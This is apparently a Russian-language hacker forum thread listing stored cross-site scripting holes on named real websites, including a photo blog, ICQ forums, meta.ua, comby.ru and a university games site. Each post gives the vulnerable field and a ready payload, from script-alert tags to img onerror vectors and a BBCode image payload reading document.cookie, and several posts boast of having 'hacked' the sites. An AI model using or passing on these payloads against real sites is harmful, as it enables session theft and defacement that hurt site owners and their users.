|
splashblog.com
Блоггер фоток. Заливаем новую фотку. Уязвимо поле "Caption:" Код:
"><script>alert();</script> |
http://rock-rus.com.ru/users.php
в регистрации пишем мыло Код:
blblbl@hek.cc"><script>alert('alert')</script> |
icq.com
Заходим на форумы или в группы, создаем голосование. Уязвимы поля "Answer..." Код:
<script>alert(1);</script>Работает в ие и опере. |
meta.ua
Идем в блог, создаем комментарий Код:
<script>alert(10);</script>Работает в ие и опере. |
comby.ru
Везде где можно оставить комментарий: Код:
<img src=javascript:alert()>Работает в ие и опере. |
http://planeta.solo.by/- геймерский сайт провайдера.
В личку написать: <img src=fuck onerror=alert(\'xss\') |
tForum <= b0.915
Форум малораспространённый, но всё же. Активная XSS в поле "Message". Код:
http://www.target/path/message.phpКод:
[img]javascript:alert(document.cookie)[/img] |
Отморозки
http://www.otmorozki.org/images/login_d.gif ============= Otmorozki.org ============= Заходим в любую новость пишем комментарий... Уязвимое поле "тема" ..вот там и пишем наш кодик.. Код:
"><script>alert("Отморозки вас похекале")</script> |
жесть,зачод
|
Warcraft
http://games.mipt.ru/wc3/images/miptlogo.png ============= Games.mipt.ru/wc3/ ============= Уязвимые поля при регистрации: "Полное имя" "О пользователе" "Дом.страница" Вставляем туда код Код:
"><script>alert("Mipt \nВас похекале....\nУязвимость на вашем сайте нашел я, Isis \nРеспект всему античату \nА также отдельный респект:\n gemaglabin\n Great\n blackybr\n ettee\n and etc..... Гыгы \n Короче вас похекале :))) ")</script>Isis |
| Время: 19:34 |